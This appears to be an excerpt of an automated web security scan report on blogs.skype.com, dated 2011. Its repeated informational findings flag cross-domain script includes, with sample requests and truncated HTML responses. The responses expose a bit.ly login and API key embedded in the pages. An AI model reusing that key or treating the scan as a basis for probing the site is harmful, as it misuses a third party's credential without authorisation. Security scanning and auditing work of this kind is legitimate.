<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.117. http://blogs.skype.com/en/windows/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/windows/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/windows/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:22 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 71552
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.118. http://blogs.skype.com/en/windows_mobile/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/windows_mobile/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/windows_mobile/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:23 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 61123
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.119. http://blogs.skype.com/enterprise/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /enterprise/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /enterprise/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:21 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 57644
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://voicequality.etrigue.com/cas/esp/script.asp?id=4acae"></script>
...[SNIP]...

18.120. http://blogs.skype.com/es/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /es/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /es/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:14 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 57359
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es" lang="es">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.121. http://blogs.skype.com/et/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /et/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /et/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:12 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 55910
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="et" lang="et">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.122. http://blogs.skype.com/fr/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /fr/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /fr/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:15 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 75359
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr" lang="fr">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.123. http://blogs.skype.com/garage/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /garage/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /garage/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:05 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 57867
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.124. http://blogs.skype.com/it/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /it/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /it/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:15 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 55500
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="it" lang="it">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.125. http://blogs.skype.com/ja/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /ja/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /ja/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:12 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 60566
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="jp" lang="jp">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.126. http://blogs.skype.com/ko/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /ko/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /ko/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:17 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 54552
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="ko">
<head>
<title>Skype - Skype .........</title>
<meta name="description" content="Read blogs about the latest Skype news with Skype blogs" />
<meta name="keywords" conte
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.127. http://blogs.skype.com/linux/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /linux/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /linux/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:07 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 136114
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...

18.128. http://blogs.skype.com/mac/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /mac/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /mac/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:05 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 54709
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.129. http://blogs.skype.com/pl/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /pl/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /pl/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:18 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 58234
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="pl" lang="pl">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.130. http://blogs.skype.com/play/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /play/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /play/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:04 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 52934
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.131. http://blogs.skype.com/pt/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /pt/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /pt/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:16 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 58394
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="pt" lang="pt">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.132. http://blogs.skype.com/ru/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /ru/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /ru/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:19 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 58654
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="ru">
<head>
<title>Skype - Skype ........ ....cc......</title>

<meta http-equiv="content-type" content="text/html; charset=utf-8" />


<!-- Microsoft smarties -->
<meta h
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
